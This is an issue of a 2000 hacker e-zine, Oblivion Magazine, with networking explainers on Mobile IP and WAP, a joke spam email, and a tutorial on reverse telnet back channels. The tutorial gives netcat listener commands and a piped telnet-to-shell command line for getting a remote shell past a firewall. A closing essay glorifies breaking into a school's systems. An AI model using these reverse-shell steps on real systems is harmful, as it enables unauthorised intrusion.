IWS - The Information Warfare Site
News Watch Make a  donation to IWS - The Information Warfare Site Use it for navigation in case java scripts are disabled



M a g a z i n e

-=[ Oblivion Magazine ]=-

-=[ http://www.0blivion.org ]=-

Where do you want to r00t today?

-=[ Editor: Cyber0ptix ]=-
-=[ cyberoptix@0blivion.org ]=-

-=[ Assistant Editor: Slider ]=-
-=[ Slider@0blivion.org ]=-

-=[ Writer/Advice: LockDown ]=-
-=[ lock-down@hushmail.com ]=-

Ripping Up Sanity For The Masses

-=[ IRC: #OBLIVIONMAG on EFNet ]=-


Designed in pico

-=[ Issue 8 - 15/10/2000 ]=-

-=[ Contents ]=-

--------------------------------------- -----------------
[ Articles ] [ Author ]
+-------------------------------------+ +---------------+
[ Contents ] [ 0blivion.org ]
[ Introduction To Issue 8 ] [ Cyber0ptix ]
[ Rant ] [ Slider ]
[ Reverse Telnet/Back Channels ] [ Dysphunktion ]
[ Mobile IP ] [ Slider ]
[ Business Oppotunities ] [ 0blivion.org ]
[ Wireless Applications Protocol ] [ Slider ]
[ Why Hack? ] [ Illusion ]
[ End Credits ] [ 0blivion.org ]
--------------------------------------- -----------------


Introduction to Issues 8 - Cyber0ptix

Welcome to issue 8, well yeah its a little bit late, but better late than
never hey, and at least we havent died. Well the main reason for it being
late is lack of articles and time. Me and Slider have been busy this
month and didn't really have enough time to be writting articles all
month. Well we got a few from you, our readers, and these have been
included in the issue. Remeber, if you ever fancy writing a little
article or text, on any subject then send it in and well try and include
it in 0blivion, what the worst that could happen? We could say no and
laugh at you in the editorial, but Im sure we wont.

Well not alot has happened this month, ive mainly been working and trying
to get promoted, which should be happening soon ;o) Also been back at uni
for a nice and steady 1 hour week ;o) ahh the joys of being a part time
student with a full time job, even managed to get finance to buy a new
computer which should be here next week ;o)


Sliders little rant - Slider

Wazzzzzzzzzzzzzzzzzzup? this month has mostly been spent shouting this word
across pubs/clubs/and streets, because of those ruddy Budweiser adverts
and their spin-off's.

What also have I been upto, well my life has taken a turn for the better! my
job is top value and life couldnt be better! i have a nice car more money
than ever, but no girl friend.. heh! what do i need one of them
for? Constant sex, loving relationship, commitment.. erk! hang on, what am
i saying??? Im a computer geek!, all i need is a shell account, BitchX and
#sex on EFNet.

Anyways, writing text files have kinda taken a back seat for me at the
moment, i am more interested in sleeping.. no honestly, i dont have much
time anymore, i spend most of the time on the road and doing courses, this
will settle down soon and i will be writing text files as before... This
month I had only written one article for 0blivion, and until Cyber sent me
a text message saying that he did not have enough articles, i had to write
one the same night/day..

So, guys/gals where the hell are your articles??? 0blivion only exists if we
get articles and text files. So, if anyone has any text's/articles that
they have written and would like them published, then send it into
us. Or, if you have any ideas for text files or an article then give us a
shout, and we would be v. much happy to check it out and help you out in

Thanks to any of you that have supplied articles, and please keep on pumping
it out we very much want your help and articles to keep on pushing
0blivion furthur. Also, thanks to any of you that have supplied feedback
on 0blivion, we have taken this into consideration and actioned your
questions/answers/points of view.

Also, if you are interested Hants 2600 is going to blow off again very soon
if anyone is interested in joining in.

Many thanks.

- Slider


Reverse Telnet/Back Channels - dysphunktion

This is a fairly short text on the principles behind reverse telnet and back
channel attacks.

First we must set up a scenario for our telnet sessions to take place in.
Imagine the server that you want access to is behind a standard packet
switching firewall which is only allowing connections through ports 80
(HTTP) and 443 (HTTPS), this is quite often the case that you find and
without other points of access these ports will have to be used.

Now in order to use a back channel / reverse telnet you first need to have
identified a vulnerability already on the server that allows you to execute
commands on that server. An example of this would be the as ever famous but
now obsolete PHF exploit but any exploit that lets you execute commands is
also very useable. PHF is the example of an exploit that will be used in
this text purely because it is well known and so the theory of back channels
/ reverse telnet can be followed easily without having to worry about how
the exploit is working.

So we have identified an exploit but because of the firewall we cant connect
to any other port than 80 and 443. To start finding anything juicy on the
server we need to get access via telnet but with the firewall in place we
cannot connect to port 23 so it seems we are a bit buggered. But wait a sec
the firewall will let the server telnet out to other systems so if we could
sweet talk the server into telneting us then we could get a telnet
connection to the server through the firewall without a problem (assuming of
course telnet is installed on the server, which it is in almost all default
installs). To start a reverse telnet session (a telnet session that
originates at the server end rather than your PC) we need to use netcat (how
would we cope without it !!) , we need to get it listening on ports 80 and
another port , this other port could be any port but it has to be one that
the firewall lets by on outbound traffic ( 21,25 etc etc just trial and
error until ya get one) so the commands for getting netcat to listen on
these ports are:

nc -l -vv -p 80
nc -l -vv -p 21

Once we have netcat listening we have to initiate the reverse telnet by
using the exploit we identified earlier. In our example PHF the command
would be:


What this does is as follows:

/bin/telnet your_ip_address 80 - This connects to your PC on port 80 (which
netcat is listening on). This is the telnet
screen that you will type the commands you
want executed in.

| /bin/sh - This pipes the output from the previous telnet screen into the
shell of the server.

|/bin/telnet your_ip_address 21 - Then results of the commands we executed
via the first telnet screen are piped
into a new telnet screen that comes to
our computer on port 21 which the firewall
allows through.

Bang there you go, you have telnet on the server even though the firewall
wouldn't let you connect to the server in the standard way, from here it's
up to you what you do! Depending on the binaries that are on the target
server all sorts of back channels can be created, not just telnet but things
like xterm as well (nice if you can find it).


Mobile IP - Slider

- Mobile IP

In the DHCP and DDNS environment, DHCP provides a device with a valid IP
address for the point at which it is attached to the network. DDNS provides
a method of locating that device by its host name, no matter where that
device happens to be attached to a network and what IP address it has been

An alternative approach to the problem of dealing with mobile devices is
provided in RFC 2002 IP Mobility Support. IP Mobility Support, commonly
referred to as Mobile IP, is a proposed standard.

-- Mobile IP Overview

Mobile IP allows a device to maintain the same IP address (its home
address) wherever it attaches to the network. (Obviously, a device with an
IP address plugged into the wrong subnet will normally be
unreachable.) However, the mobile device also has a care-of address,
which relates to the subnet where it is currently located. The care-of
address is managed by a home agent, which is a device on the home subnet
of the mobile device. Any packet addressed to the IP address of the mobile
device is intercepted by the home agent and then forwarded on to the care-of
address through a tunnel. Once it arrives at the end of the tunnel, the
datagram is delivered to the mobile device. The mobile node generally uses its
home address as the source address of all datagrams that it sends.

Mobile IP can help resolve address shortage problems and reduce administrative
workload, because each device that needs to attach to the network at
multiple locations requires a single IP address only.

The following terminology is used in a mobile IP network configuration:

* Home Address
The static IP address allocated to a mobile node. It does not change no
matter where the node attaches to the network.

* Home Network
A subnet with a network prefix matching the home address of the mobile
node. Datagrams intended for the home address of the mobile node will
always be routed to this network.

* Tunnel
The path followed by an encapsulated datagram.

* Visited Network
A network to which the mobile node is connected, other than the node's
home network.

* Home Agent
A router on the home network of the mobile node that maintains current
location information for the node and tunnels datagrams for delivery to
the node when it is away from home.

* Foreign Agent
A router on a visited network that registers the presence of a mobile node
and detunnels and forwards datagrams to the node that have been tunneled
by the mobile node's home agent.

-- Mobile IP Operation

Mobility agents (home agents and foreign agents) advertise their presence on the
network by means of agent advertisement messages, which are ICMP router
advertisement messages with extensions. A mobile node may also explicitly
request one of these messages with an agent solicitation message. When a
mobile node connects to the network and receives one of these messages, it is
able to determine whether it is on its home network or a foreign network. If
the mobile node detects that it is on its home network, it will operate
normally, without the use of mobility services. In addition, if it has
just returned to the home network, having previously been working elsewhere,
it will deregister itself with the home agent. This is done through the
exchange of a registration request and registration reply.

If, however, the mobile node detects from an agent advertisement that it has
moved to a foreign network, then it obtains a care-of address for the foreign
network. This address may be obtained from the foreign agent (a foreign
agent care-of address, which is the address of the foreign agent itself),
or it may be obtained by some other mechanism such as DHCP (in which case it is
known as a co-located care-of address). The use of co-located care-of
addresses has the advantage that the mobile node does not need a foreign
agent to be present at every network that it visits, but it does require
that a pool of IP addresses is made available for visiting mobile nodes by
the DHCP server.

Note that communication between a mobile node and a foreign agent takes place
at the link layer level. It cannot use the normal IP routing mechanism,
because the mobile node's IP address does not belong to the subnet in which it
is currently located.

Once the mobile node has received its care-of address, it needs to register
itself with its home agent. This may be done through the foreign agent, which
forwards the request to the home agent, or directly with the home agent.

Once the home agent has registered the care-of address for the mobile node in
its new position, any datagram intended for the home address of the mobile node
is intercepted by the home agent and tunneled to the care-of address. The tunnel
endpoint may be at a foreign agent if the mobile node has a foreign agent
care-of address), or at the mobile node itself (if it has a co-located care-of
address). Here the original datagram is removed from the tunnel and delivered
to the mobile node. The mobile node will generally respond to the
received datagram using standard IP routing mechanisms.

-- Mobile IP Registration Process

RFC 2002 defines two different procedures for mobile IP registration. The mobile
node may register via a foreign agent, which relays the registration to the
mobile node's home agent, or it may register directly with its home agent. The
following rules are used to determine which of these registration
processes is used:

* If the mobile node has obtained its care-of address from a foreign agent,
it must register via that foreign agent.

* If the mobile node is using a co-located care-of address, but has received
an agent advertisement from a foreign agent on this subnet, which has
the R bit (registration required) set in that advertisement, then it
should register via the agent. This mechanism allows for accounting to
take place on foreign subnets, even if DHCP and co-located care-of address
is the preferred method of address allocation.

* If the mobile node is using a co-located care-of address but has not
received such an advertisement, it must register directly with its home

* If the mobile node returns to its home network, it must (de)register
directly with its home agent.

The registration process involves the exchange of registration request and
registration reply messages, which are UDP datagrams. The registration
request is sent to port 434.

-- Tunneling

The home agent examines the destination IP address of all datagrams arriving on
the home network. If the address matches with any of the mobile nodes
currently registered as being away from home, then the home agent tunnels
(using IP in IP encapsulation) the datagram to the care-of address for that
mobile node. It is likely that the home agent will also be a router on the
home network. In this case it is likely that it will receive datagrams
addressed for a mobile node that is not currently registered as being away
from home. In this case, the home agent assumes that the mobile node is at
home, and forwards the datagram to the home network.

When a foreign agent receives a datagram sent to its advertised care-of
address, it compares the inner destination address with its list of
registered visitors. If it finds a match, the foreign agent forwards the
decapsulated datagram to the appropriate mobile node. If there is no match,
the datagram is discarded. (The foreign agent must not forward such a
datagram to the original IP header, otherwise a routing loop will occur.)

If the mobile node is using a co-located care-of address, then the end of the
tunnel lies at the mobile node itself. The mobile node is responsible for
decapsulating the datagrams received from the home agent.

-- Broadcast Datagrams

If the home agent receives a broadcast datagram, it should not forward it to
mobile nodes unless the mobile node specifically requested forwarding of
broadcasts in its registration request. In this case, it will forward the
datagram in one of the followingmanners:

* If the mobile node has a co-located care-of address, the home agent simply
encapsulates the datagram and tunnels it directly to the care-of address.

* If the mobile node has a foreign agent care-of address, the home agent first
encapsulates the broadcast in a unicast datagram addressed to the home
address of the node. It then encapsulates and tunnels this datagram to the
care-of address. In this way the foreign agent, when it decapsulates the
datagram, knows to which of its registered mobile nodes it should forward
the broadcast.

-- Move Detection

Mobile IP is designed not just for mobile users who regularly move from one
site to another and attach their laptops to different subnets each time,
but also for truly dynamic mobile users (for example, users of a wireless
connection from an aircraft). Two mechanisms are defined that allow the
mobile node to detect when it has moved from one subnet to another. When
the mobile node detects that it has moved, it must re-register with a
care-of address on the new foreign network. The two methods of move
detection are as follows:

1. Foreign agents are consistently advertising their presence on the network by
means of agent advertisements. When the mobile node receives an agent
advertisement from its foreign agent, it starts a timer based on the
lifetime field in the advertisement. If the mobile node has not
received another advertisement from the same foreign agent by the time the
lifetime has expired, then the mobile node assumes that it has lost
contact with that agent. If in the meantime it has received an
advertisement from another foreign agent, it may immediately attempt
registration with the new agent. If it has not received any
further agent advertisements, it should use Agent solicitation to try and
locate a new foreign agent with which to register.

2. The mobile node checks whether any newly received agent advertisement is on
the same subnet as its current care-of address. If the network prefix is
different, the mobile node assumes that it has moved. On expiry of its
current care-of address, the mobile node registers with the foreign agent
that sent the new agent advertisement.

-- Returning Home

When the mobile node receives an agent advertisement from its own home agent,
it knows that it has returned to its home network. Before deregistering with the
home agent, the mobile node must configure its routing table for operation on
the home subnet.

-- ARP Considerations

Mobile IP requires two extensions to ARP to cope with the movement of mobile
nodes. These are:

* Proxy ARP
An ARP reply sent by one node on behalf of another that is either unable
or unwilling to answer ARP request on its own behalf.

*Gratuitous ARP
An ARP packet sent as a local broadcast packet by one node that causes all
receiving nodes to update an entry in their ARP cache.

When a mobile node is registered as being on a foreign network, its home agent
will use proxy ARP in response to any ARP request seeking the mobile node's
MAC address. The home agent responds to the request giving its own MAC

When a mobile node moves from its home network and registers itself with a
foreign network, the home agent does a gratuitous ARP broadcast to update the
ARP caches of all local nodes on the network. The MAC address used is again the
MAC address of the home agent.

When a mobile node returns to its home network, having been previously
registered at a foreign network, gratuitous ARP is again used to update ARP
caches of all local nodes, this time with the real MAC address of the
mobile node.

-- Mobile IP Security Considerations

The mobile computing environment has many potential vulnerabilities with regard
to security, particularly if wireless links are in use, which are particularly
exposed to eavesdropping. The tunnel between a home agent and the care-of
address of a mobile node could also be susceptible to interception, unless a
strong authentication mechanism is implemented as part of the registration
process. RFC 2002 specifies implementation of keyed MD5 for the
authentication protocol and advocates the use of additional mechanisms (such as
encryption) for environments where total privacy is required.

RFC 2002 can be located doing a search on your fave. search engine.



Business Oppotunites - 0blivion.org

After deciding that 0blivion.org needed a finacial investment to enable
us to compete in the ever increasing market of information security we
scoured the internet to find the best money making oppotunities we
could. We are planning on making a small investment and want a very large
return for our money. Well we think we may have found the business
oppotunity, and because of the potential of this business plan we have
decided to share this with you the readers. This is a real email which we
received, if you want to own your own business then please feall free to
get in touch with them just like we did and within 2 months you could be a
multi millionaire just like us ;o)

Dear Sir/Madam,
We obtain your name from internet. We are looking for the "Automatic
cap-opening dustbin" importers, distributors or agent in your area. The
detail information of the dustbin is listing below. Attached file is the
picture of "Auto-opening dustbin" It would be much appreciated if you
can forward this information to your members or someone who may be
interested in these products.

For further more information, please contact us:
Ninestars Group
Tel: (86)591-7562088
Fax: (86)591-7508258
Address: Room 2401, B district Jinyuan Garden, 328 north 61 road,
Fuzhou, China.
Postcode: 350001

Thank you and best regards,
Mr. Shi hongxiang
Marketing department

A Brief Introduction of Electronic Inductive Automatic Cap-opening

When you are opening the cap of a dustbin now sold in the market, you
have to touch with your hand or tread with your foot over the dustbin.
It is very inconvenient, besides also much worse, you have a possibility
of bacterial infection. But now, with delicate research, our company
firstly invents a kind of automatic cap-opening dustbin based on infra
red ray induction in the world. When your hand or some other objects are
only about 15cm away from the induction window of the dustbin, the cap
of the dustbin will open automatically. After the rubbish has been
thrown into the dustbin, the cap will close automatically. You and
objects need not contract with the dustbin. This product is controlled
by computer chips and is consisted of infra red detecting device
together with mechanical and electrical drive system. It is a high-tech
product, a combination of machine-light-electricity technique. It also
has many advantages, such as high performance, longer life than common
dustbin in serving, low energy consuming and so on.


1.Open the cover of the battery case at the bottom of the induction dustbin.
And equipped it with four batteries. Don't wrong-side the negative and the
positive pole.

2.Open the power switch at the behind of the dustbin. At this moment, the red
indicator lamp will be on for 3seconds.Then it will flash every 2 seconds,
which shows that the circuit is now in normal working condition.

3.When you're going to throw rubbish into it, only keep the objects or your
hand about 15cm high above the induction window (in vertical direction). The
cap will automatically open within 0.5 second. After throwing the rubbish
into the dustbin, the cap will automatically close about 3 seconds when you
put your hand away from the induction window.

4.Press the button that is on the left of the induction window (cap which can
be opening only by hand) the cap opens automatically but it cannot close
automatically. If you close it, you have to press the on-the-right-side
button. Press the on-the-right-side button. Again, the circuit will be in the
automatic process.

(1) The indicator lamp in the normal waiting state flashes red (once every 2

(2) When the cap is automatically open, the indicator lamp is continuously

(3) In the process of automatically closing, the indicator lamp is
continuously yellow.

(4) While the cap is opened by hand, it turns to flash green (once every 2

6.When the battery is going to be used up, the indicator turns to flash yellow.
Suppose you use the dustbin 20 times each day, the batteries can also be used
for nearly 6 months. Since this product is equipped with electronic units.
You cannot wash the dustbin with the dustbin with water. If it is dirty,
you can clean it with a wet cloth.


Wireless Applications Protocol - Slider

WAP - Wireless Application Protocol

Imagine driving down the motorway at 120mph while reading your email.. not
possible you say.

Well, you lie..! Thanks to WAP (Wireless Application Protocol) it is now
possible to do this, it is also possible to read the reviews of movies
while standing in the queue at the video store over your mobile phone.

- WML and WAP

Hopefully you are all familiar with HTML language used to make Web pages.
After you write an HTML page, you save it with an .HTML file extension, and
then you place it in a specific folder of your Web box. When people want
to access your page they type


The server sends the tags from your HTML file back to the browser, which
renders them on the screen. This request and response is called the
Hypertext Transfer Protocol (HTTP).

Wireless Markup Language (WML) works along the same lines as HTML, except
that it is for small screens and low refresh rates/graphic details. You
create a WML page in a text editor, and save it with a .WML file
extension, much like the HTML based document.

Below, is an example of WML in action.

<?xml version="1.0"?>
<!DOCTYPE wml PUBLIC "-0blivion.org tekniq 1.1//EN"

The example is a very basic WML based page, that displays a title and a

Wireless Application Protocol (WAP) is the protocol that allows mobile
phones and other wireless devices to connect to the Internet.

You might be wondering why WML and WAP are even needed. Why not stay with
HTML and HTTP, which is universally available?

Some mobile devices do. But to really take advantage of what wireless
network and mobile devices have to offer, WML and WAP are necessary to get
by problems in technologies for example they have less powerful CPUs, less
memory, smaller displays, and limited input capabilities.

Wireless data networks also have less bandwidth, less predictable
availability, and less connection stability than the typical home or
office network.

- Publishing WML

If you have a Web server installed on your own computer, you can test your
WML file pretty easily. But first, you have to configure your Web server
so that it understands WML decks and their MIME type. I use the Apache
HTTP Server, so to make this configuration change, I
had to edit the httpd.conf file and add the following line:

AddType text/vnd.wap.wml wml

If you use the IBM HTTP Web server, just add it to the same file. If you use
a Netscape or IIS, or others then, consult the server's documentation to
find out what changes to make. If you are hosted by someone else, then ask
them about enabling WAP.

[Cyber0ptix - Alternatively you can enable it yourself on a box by simply
adding the line to a .htaccess file and placing it in the folder you are
service WML files from.]

You can download WML browsers from Phone.com, Nokia, Ericsson, Slob Trot,
and a few other places.

Once you've got a browser installed, you can just enter the URL for your WML
deck, just as you would in an ordinary browser, such as


- Resources/links

To find out more about WAP and how to write it then look at


For more information and annoucments, check out




Why Do we hack? - Illusion

Why do we hack?

Why? The big question. Why do we, as a hacker community, hack? It has
given thousands an undeserved bad name and put thousands in jail. Yet we
persist. We continue this insane crusade of hacking!! I will incite you,
as a hacker, and others, from the non hacking community, into the mind of a

It starts in grade school. We all started with something. For some it was
an apple II and yet for others it was DOS 5.x with win 3.1 installed over
it. No one knew anything. All we did was play games or browse folders.
Then came the internet. Holy shit! I can talk to people across the world!
I can be whoever / whatever I want to be. All I have to do is type! Then I
heard of a hacker. Now what's this. A hacker...at that time "hacker"
wasn't such a bad name. It was still mainly used for programmers who
"hack" at code until its perfect. I didn't know who or what a hacker was
all I knew was that it sounded interesting.

It started with simple script kiddy stuff. You basic sub7 or you simple
virri. This didn't take much. All I would do is take the disk to the
target.....plug it in and presto. Go home and I can access their comp.
Ahhhh......real elite. Then you read. I think all hackers are born good
readers. You read about programs called telnet and ftp. What's this? I
can do all this stuff without having to pop in a disk? Wow. You start
playing around with these tools. You learn about ports and their
weaknesses. You learn about basic password cracking and finding ways around
them. Its still real simple stuff.

Then comes the glory. You crack your first system. Everyone can remember.
Its a thrill of a lifetime. I remember calling my friend and telling him
how I did it. It was my school. We had lots of fun with that school.
Learning more and more each time you signed online.

I think that's why we do it. Why we commit ourselves to do this crime. I
have talked to a countless number of hackers and they all agree. Some
people say its the quest for knowledge. And yes I agree. It is. I always
love learning something new and then trying it out. Everyone has been
there. Staying up till 2 AM so you can finish reading the article.

I hope that this has showed a little bit into a hackers mind. For a hacker
is misunderstood. No one is out there to be malicious and cruel but they
are out there for the thrill and the knowledge. With this I hope that you
understand the hacker better......for it is not us that is the criminal but



\____ 0wning The World Is A Slow Process,So Give Up And Let Us Gain R00t On You

#OblivionMag EFNet
Copyright 0blivion.org 2000
B0w Down And Feer The Revolution Of Oblivion
Designed On 800x600 Resolution
Sponsors : http://www.slidersecurity.co.uk
Music : Green Velvet - Flash 'Cameras ready, prepare to flash!!'
Drink : Anything, preferably strong ;o)
Thanks : Vortex, For hosting 0blivion.org
Abattis and Gossi for re-hosting 0blivion.org
Lockdown, kermit and Omega for their work.
Atomix for his Bot's on #oblivionmag
Spammy for his Bot's on #oblivionmag
My new dealer for provider me with quality skunk ;o)
Gatecrasher/Bed in sheffield for two tops nights
Aleph1, R.F.P and all the h0es that make our lives worth living
online And Akt0r, DC_`, d0tslash, Cl0wn, TNC, redmang, Slinkie and
a few others #darkcyde, #bellcrew, #2600-uk, #bifemunix, #hax0r,
#b10z, #beyond, #japan
Woman : Rachel, S club 7 babe ;o)